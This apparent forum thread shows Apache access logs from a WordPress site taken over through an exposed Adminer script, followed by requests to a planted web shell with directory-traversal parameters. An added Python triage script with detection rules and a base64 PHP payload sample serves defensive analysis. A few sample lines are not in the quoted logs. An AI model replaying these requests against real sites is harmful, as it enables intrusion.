access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:56 -0500] "GET /wp-admin/theme-install.php?browse=featured HTTP/1.1" 200 13107 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:57 -0500] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 9137 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 15335 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:03 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50368 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:08:05 -0500] "GET /wp-admin/options-general.php HTTP/1.1" 200 18686 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:07 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3010 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:08:08 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3061 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:09 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3074 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"



Code:
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:29 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2300 "-" "Go-http-client/1.1"
access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:07:32 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 302 448 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2728 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:42 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:46 -0500] "GET /wp-login.php HTTP/1.1" 200 1795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:51 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.172 - - [10/Dec/2019:17:07:52 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.171 - - [10/Dec/2019:17:07:53 -0500] "GET /wp-admin/theme-editor.php?file=footer.php&theme=photographer-wp HTTP/1.1" 200 12475 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:07:54 -0500] "GET /wp-admin/theme-editor.php?file=functions.php&theme=photographer-wp HTTP/1.1" 200 36617 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:07:55 -0500] "POST / HTTP/1.1" 206 6145 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:08:00 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 403 2021 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.124 - - [10/Dec/2019:17:08:01 -0500] "POST /wp-content/plugins/supersociall/supersociall.php HTTP/1.1" 404 4632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:08:02 -0500] "POST /wp-admin/options.php HTTP/1.1" 403 2039 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.95 - - [10/Dec/2019:17:08:03 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:08:06 -0500] "POST /wp-admin/options.php HTTP/1.1" 302 489 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.77 - - [10/Dec/2019:17:08:07 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2806 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:08:08 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2841 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:08:09 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

What does this shit mean? I traced this all the way back to an Adminer exploit. Someone left an unpatched Adminer on the system *cough cough, not me.. totally was me*. Ah well, we all fk up sometimes. :)

Evidence not to leave tools floating around public-facing.. dddaaaayummmiittttt h00000m0000000z stoooop hacccckking me lol :)
 

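The log lines quoted above are enough to script the triage. One thing worth noticing before doing so: every client address in them (162.158.x.x, 141.101.x.x, 172.68/69.x.x, 108.162.x.x, 103.22.200.x) sits inside Cloudflare's published edge ranges, so what Apache logged is the proxy, not the attacker; the real client IP only exists in the CF-Connecting-IP header and is absent from these logs unless the server was configured to restore it (mod_remoteip or mod_cloudflare). The following Python is an added example, not the poster's tooling: it parses combined-log lines as `zgrep` prints them (with the `filename:` prefix), flags the indicators that appear in this thread (Adminer scripts, theme-editor edits, plugin uploads, PHP under `wp-content/uploads/`, PUT of PHP files, base64 `d1=` payloads, `..` in query values), and marks which source addresses are Cloudflare edges. The sample log, the rule labels and the Cloudflare list are constructed here; refresh the ranges from cloudflare.com/ips-v4 before relying on them.

```python
import base64
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# Constructed sample: lines copied from the access logs quoted above (user agents
# shortened) plus one benign request for contrast. Real input: zcat access.log.*.gz
SAMPLE_LOG = r'''
access.log.8.gz:162.158.90.171 - - [10/Dec/2019:17:07:53 -0500] "GET /wp-admin/theme-editor.php?file=footer.php&theme=photographer-wp HTTP/1.1" 200 12475 "-" "Mozilla/5.0"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:08:00 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 403 2021 "-" "Mozilla/5.0"
access.log.8.gz:162.158.94.77 - - [10/Dec/2019:17:08:07 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2806 "-" "Mozilla/5.0"
access.log.8.gz:172.69.55.37 - admin [11/Dec/2019:10:21:29 -0500] "PUT /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 200 291 "-" "Go-http-client/1.1"
access.log.8.gz:141.101.104.212 - - [11/Dec/2019:10:21:30 -0500] "GET /wp-content/uploads/2019/12/wp-simple-plugin.php?d1=dmFyX2R1bXAoIi0tbGQtLSIpOw== HTTP/1.1" 206 334 "-" "Mozilla/5.0"
access.log.2.gz:172.69.54.168 - - [23/Jan/2020:08:23:28 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 861 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jan/2020:08:30:00 -0500] "GET /wp-content/uploads/2019/12/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
'''

# Cloudflare's published IPv4 edge ranges at the time of writing (assumption:
# verify against https://www.cloudflare.com/ips-v4 before use).
CLOUDFLARE_V4 = [ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Apache combined-log line, optionally prefixed with "filename:" as zgrep prints it.
LINE_RE = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def is_cloudflare_edge(ip: str) -> bool:
    """True if the logged address is a Cloudflare proxy, meaning the real client
    IP was only in the CF-Connecting-IP header and is not in this log at all."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in CLOUDFLARE_V4)


def decodes_to_php(value: str) -> bool:
    """True if a query value base64-decodes to something shaped like a PHP
    statement, e.g. dmFyX2R1bXAoIi0tbGQtLSIpOw== -> var_dump("--ld--");"""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return re.search(r"\w+\(.*\);", text) is not None


def indicators(method: str, target: str) -> list:
    """Rules distilled from the thread; each appends a label when it fires."""
    parts = urlsplit(target)
    path, query = parts.path, parse_qs(parts.query)
    hits = []
    if re.search(r"/adminer[^/]*\.php$", path, re.I):
        hits.append("adminer-script")        # DB tool left web-reachable
    if path.endswith("/wp-admin/theme-editor.php") and "file" in query:
        hits.append("theme-editor-access")   # editing theme PHP through wp-admin
    if path.endswith("/wp-admin/update.php") and query.get("action") == ["upload-plugin"]:
        hits.append("plugin-upload")
    if path.startswith("/wp-content/uploads/") and path.lower().endswith(".php"):
        hits.append("php-under-uploads")     # uploads/ should never execute PHP
    if method == "PUT" and path.lower().endswith(".php"):
        hits.append("put-php")               # file dropped over HTTP PUT
    if any(decodes_to_php(v) for vals in query.values() for v in vals):
        hits.append("base64-php-param")      # d1=... style code delivery
    if any(".." in v for vals in query.values() for v in vals):
        hits.append("dotdot-in-query")       # ptz=/../.. traversal probing
    return hits


def scan(log_text: str) -> list:
    """Parse every line and keep those that trip at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = indicators(m["method"], m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "via_cloudflare": is_cloudflare_edge(m["ip"]),
                "method": m["method"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        edge = " (Cloudflare edge, real client not logged)" if f["via_cloudflare"] else ""
        print(f'{f["ip"]}{edge} {f["method"]} {f["path"]} {f["status"]} -> {", ".join(f["hits"])}')
```

Feed it `zcat /var/log/apache2/access.log.*.gz | python3 triage.py` style input and the benign `photo.jpg` request stays silent while the six attack lines are labelled; the `via_cloudflare` flag is the reminder that blocking these addresses would block the CDN, not the attacker.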

Asphyxia

Just fetching more logs because I can:

Code:
zgrep -a "wp-simple-plugin.php" *gz



results:

Code:
access.log.2.gz:141.101.77.191 - - [22/Jan/2020:12:51:26 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.54.168 - - [22/Jan/2020:14:16:41 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.13 - - [22/Jan/2020:14:16:41 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.103 - - [22/Jan/2020:14:18:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.76.97 - - [22/Jan/2020:14:20:02 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.11 - - [23/Jan/2020:08:22:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.221 - - [23/Jan/2020:08:22:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.54.168 - - [23/Jan/2020:08:23:28 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 861 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.76.97 - - [23/Jan/2020:08:23:30 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 206 541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:162.158.111.28 - - [23/Jan/2020:08:23:32 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.54.168 - - [23/Jan/2020:08:24:02 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 3518 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.76.97 - - [24/Jan/2020:11:53:47 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.79 - - [24/Jan/2020:11:53:48 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.53 - - [24/Jan/2020:11:54:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 861 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.103 - - [24/Jan/2020:11:54:19 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 206 541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.191 - - [24/Jan/2020:11:54:20 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.163 - - [24/Jan/2020:11:54:50 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 3518 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.43 - - [15/Jan/2020:05:12:06 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.107 - - [15/Jan/2020:05:12:06 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.107 - - [15/Jan/2020:05:12:09 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:141.101.107.207 - - [15/Jan/2020:05:13:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:141.101.99.164 - - [15/Jan/2020:05:13:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.69 - - [15/Jan/2020:05:13:24 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.158.174 - - [15/Jan/2020:05:48:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.85 - - [15/Jan/2020:05:48:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.158.174 - - [15/Jan/2020:05:49:51 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.158.148 - - [16/Jan/2020:09:43:42 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.43 - - [16/Jan/2020:09:43:43 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.155.83 - - [16/Jan/2020:09:45:23 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:141.101.99.14 - - [17/Jan/2020:03:03:30 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.155.83 - - [17/Jan/2020:03:03:30 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.154.226 - - [17/Jan/2020:03:05:11 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.37 - - [17/Jan/2020:03:06:51 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:141.101.77.155 - - [29/Dec/2019:18:58:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.172 - - [29/Dec/2019:18:58:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.190 - - [29/Dec/2019:18:58:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.21 - - [29/Dec/2019:18:58:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.94.53 - - [30/Dec/2019:19:18:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [30/Dec/2019:19:18:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.193 - - [30/Dec/2019:19:18:35 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [30/Dec/2019:19:19:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.109 - - [30/Dec/2019:19:19:35 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.56 - - [30/Dec/2019:19:20:35 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

